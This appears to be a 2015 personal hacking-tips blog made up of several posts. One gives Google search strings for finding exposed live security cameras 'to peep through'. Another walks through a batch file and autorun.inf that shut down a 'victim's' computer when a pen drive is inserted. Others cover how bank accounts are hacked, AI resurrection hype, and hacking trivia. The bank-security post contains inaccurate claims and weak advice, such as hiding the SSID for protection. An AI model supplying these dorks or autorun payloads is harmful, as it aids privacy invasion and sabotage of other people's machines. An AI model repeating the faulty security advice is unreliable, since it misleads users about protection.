Friday 4 December 2015

Live Cameras Around The World

Go To Google And Search Any Of The Texts Given Below And Peep Through Live Cameras Around The World.

• inurl:”CgiStart?page=”

• inurl:/view.shtml* intitle:”Live View / — AXIS

• inurl:view/view.shtml

• inurl:ViewerFrame?Mode=

• inurl:ViewerFrame?Mode=Refresh

• inurl:axis-cgi/jpg

Thank you.
                            - Nilabh

How To Shutdown Computer Using Pendrive

Step 1:>>copy this  code into notepad:

@echo off
shutdown -s -t 00
Save as fun.bat extension (for eg: clickme.bat).

Step 2:
Now open the notepad and copy this code:
[autorun]
Open=filename.bat
Action=Mouse Disable
Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.

Step 3:
Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off automatically.

Thank you, may thise help you.
                                -Nilabh

How Hackers Hack Bank Accounts and Personal Information

I am quite sure that almost everybody using internet nowadays uses that internet to pay online bills, book reservation tickets, purchase online things or simply transfer money i.e. involved in at least some kind of online transaction that is related to money i.e. banking information, credit or debit card payments or simply Net banking. Most of banks uses SSL(Secured Sockets Layer) connection (to read more click here )and at least 128 or 256 bit encryption for online banking and transaction purposes. Also now an extra layer of security is introduced that is called transaction PIN layer means for each and every online transaction you have to enter your passwords and during transaction you have to enter PIN (a type of password that varies 4 to 8 chars in length). Thus bank do alot of work to protect your secret information and credentials from the eyes of the world that may wish to gain access to your such a vital information.
Below example will illustrate you how powerful the encryption method is:

40 bit encryption, means there are  2^40 possible keys that could fit into the lock that holds your account information. That means there are many billions of possible keys that means brute forcing such thing is imposable. Only thing now left is dictionary and rainbow attack. But its not only the security measure that banks used to secure there information. Also its only 40 bit encryption.
128 bit encryption means there are 2^88 times as many as key combinations that are being possible for 40 bit encryption.That means a computer would require exponentially more processing power and time than for 40-bit encryption to find the correct key.
That’s a very powerful method of encrypting data sent from your machine to bank machine. But unfortunately it’s all is useless to you once your system has been compromised or hacked.
Now How these all security Encryption can be bypassed and your system can be compromised online. There are several methods for exploiting and bypassing such account information. Note : This is for educational purposes only( For more details read Disclosure).
Some of them are:

1. Phishing : We have discussed phishing on this website alot of times in tutorials like how to hack Gmail accounts password or hacking Facebook accounts and others too. But for new Guys I explain what is Phishing. Phishing is a technique to hack password and login details of a particular website using Phish pages. Now what are Phish pages? Phish Pages are simply the fake pages that looks the original webpage. The only difference between phish page and original page is the Address bar link (for normal user) and redirection post and get method( inside source for advanced users). How to identify a fake link? Just check the address bar URL for a fake page or Phish page it will be showing different URL than the original URL. Also if you want that everything is done automatically then install a Web security tool bar in your browser (AVG and Crawler web security tool bars are good choices) as it detects the phishing automatically and do not allows you to visit Phishing Pages.

2. Trojans: Trojans are type to viruses that steals your information. It can be in many forms like Keyloggers or RAT’s( remote administration tools). What a keylogger do is that it monitors all the keys that you have pressed from your physical keyboard and stores them in form of a log and send these details to hackers. RAT’s are advanced form of Keyloggers that remotely monitors all your activities where keylogger is simply a functionality. Using RAT hacker can connect to your system anonymously i.e. without your information when you are online. RAT’s have a huge list of functionality and these are best type of hacking tools available in the market. Now How you will protect yourself from Keyloggers? Just keep your antivirus updated and install Keyscramber that encrypts your keystrokes. Now why i haven’t mentioned RAT there is because once the RAT enters your system you cannot do anything other than formatting your system. So RAT’s attack only can be prevented before they enters in your system. For preventing from RAT’s Please do not download any software or cracks or keygens online. Also avoid downloading freewares from new websites use certified websites only like CNET, filehippo etc.. Also please avoid testing fake hack tools (recommended for hackers) because most hacking tools have keylogger and RAT’s attached to them. Test it under secured conditions like on Virtual Users. Means install virtual operating system user Virtual PC or Virtual Box and then test them there.

3. Session Hijacking: Most of us uses Wireless Networks to access the internet and data flow in form of packets and channels. And we know that Wireless are easier to hack as they have very weak encryption. So Hackers hack the wireless networks and using session Hijacking they take control of the internet data transfer and redirects the user from original path to their path. Means suppose you are visiting Google or Gmail or Facebook, then hacker when get access then he can redirect you to any of the page and capture you account details. Packet sniffing is another way to hack the account information and credentials using the wireless networks where Hackers captures packets and decrypt these encrypted information to get the information in form of plain text. Now how you will prevent this? Its also pity simple to prevent this, you need to hide you SSID and BSSID from being discovered by the other networks. Just leave the SSID or BSSID empty for that. Now hacker will not be able to discover your wireless router so he will not been able to hack it.

Thank you, hope thise will be able to help you in futer.
-Nilabh

Monday 30 November 2015

A technology that can bring dead back to life might be a reality soon

Researchers plan to bring dead to life by freezing their brains and then resurrecting them with artificial intelligence
Bringing the dead back to life is futuristic and final frontier of science and Humai is working on just that. Humai is a technology company based in Los Angeles and is working on a project known as “Atom & Eve” that would let human consciousness be transferred to an artificial body after their death.
The artificial intelligence company has said it can resurrect human beings within the next 30 years. The “conversational styles, [behavioural]patterns, thought processes and information about how your body functions from the inside-out” would be stored on a silicon chip through AI and nanotechnology.
Humai researchers are banking on three technologies – bionics, nanotechnology and artificial intelligence – to achieve their goal of bringing the dead back to life and they feel that it will take around three decades for them to achieve this goal.
The founder of Humai, Josh Bocanegra told the Australian Popular Science : “I accept death, I’m not afraid of it that I’m not 100% sure I’m going to die one day.” While their Facebook page states , “Will death always be inevitable? We don’t think so.”
Bocanegra told Australian Popular Science that the brain of the deceased will be frozen using cryonics technology so that when the technology is fully developed they can implant the brain into an artificial body.
Humai says that bringing a body back to life won’t be easy, or cheap. It’s not known how the brains would be harvested, or for that matter, how much it would cost to bring someone back from the dead. Bocanegra says,”Using cloning technology, we will restore the brain as it matures”. “I don’t think of it as fighting death. I think of it as making death optional. I personally cannot imagine why someone would want to die, but I respect everyone’s wishes,” Bocanegra adds.
The most astonishing fact about Humai is that it consists of only five members. Two of them are researchers, one is the ambassador and an AI expert.
Should we be playing with the nature and bringing back the dead? Do put in your views in the comments section.
Thank you

Thursday 17 September 2015

20 Things You Didn't Know About... Computer Hacking


1 Hacker originally meant “one who makes
furniture with an ax.” Perhaps because of the blunt
nature of that approach, the word came to mean
someone who takes pleasure in an unconventional
solution to a technical obstacle.
2 Computer hacking was born in the late 1950s,
when members of MIT’s Tech Model Railroad Club,
obsessed with electric switching, began preparing
punch cards to control an IBM 704 mainframe .
3 One of the club’s early programs: code that
illuminated lights on the mainframe’s console,
making it look like a ball was zipping from left to
right, then right to left with the flip of a switch.
VoilĂ : computer Ping-Pong!
4 By the early 1970s, hacker “Cap’n
Crunch” (a.k.a. John Draper) had used a toy whistle
to match the 2,600-hertz tone used by AT&T’s long-
distance switching system. This gave him access to
call routing (and brief access to jail).
5 Before they struck it rich, Apple founders Steve
Wozniak and Steve Jobs made and sold “blue boxes,”
electronic versions of Draper’s whistle.
6 Using a blue box, Wozniak crank-called the
Pope’s residence in Vatican City and pretended to be
Henry Kissinger.
7 Hacking went Hollywood in the 1983 movie
WarGames, about a whiz kid who breaks into a
Defense Department computer and, at one point, hi­
jacks a pay phone by hot-wiring it with a soda can
pull-ring.
8 That same year, six Milwaukee teens hacked into
Los Alamos National Lab , which develops nuclear
weapons.
9 In 1988 Robert T. Morris created a worm, or self-
replicating program, purportedly to evaluate
Internet security.
10 The worm reproduced too well, however. The
multimillion-dollar havoc that ensued led to
Morris’s felony conviction, one of the first under
the Computer Fraud and Abuse Act (PDF).
11 They all come home eventually. Morris now
researches computer science at...MIT.
12 British hacker Gary McKinnon broke into 97
U.S. Navy, Army, Pentagon, and NASA computers in
2001 and 2002.
13 McKinnon’s defense: He wasn’t hunting military
secrets; he was only seeking suppressed government
files about space aliens.
14 According to rumor, agents of China’s People’s
Liberation Army attempted to hack the U.S. power
grid, triggering the great North American blackout of
2003.
15 It took IBM researcher Scott Lunsford just one
day to penetrate the network of a nuclear power
station: “I thought, ‘Gosh, this is a big problem.’”
16 Unclear on the concept: When West Point holds
its annual cyberwar games , the troops wear full
fatigues while fighting an enemy online.
17 Think your Mac is hackproof? At this year’s
CanSecWest conference , security researcher Charlie
Miller used a flaw in Safari to break into a MacBook
in under 10 seconds.
18 Cyborgs beware: Tadayoshi Kohno at the
University of Washington recently hacked into a
wireless defibrillator, causing it to deliver fatal-
strength jolts of electricity.
19 This does not bode well for patients receiving
wireless deep-brain stimulators.
20 The greatest kludge of all? Roger Angel of the
University of Arizona has proposed building a giant
sunscreen in space to hack the planet’s climate.

Google Strikes Humble Tone While Promoting A.I. Technology

Google’s annual conference for software developers is usually a celebration of technology, an event that highlights how tech advancement...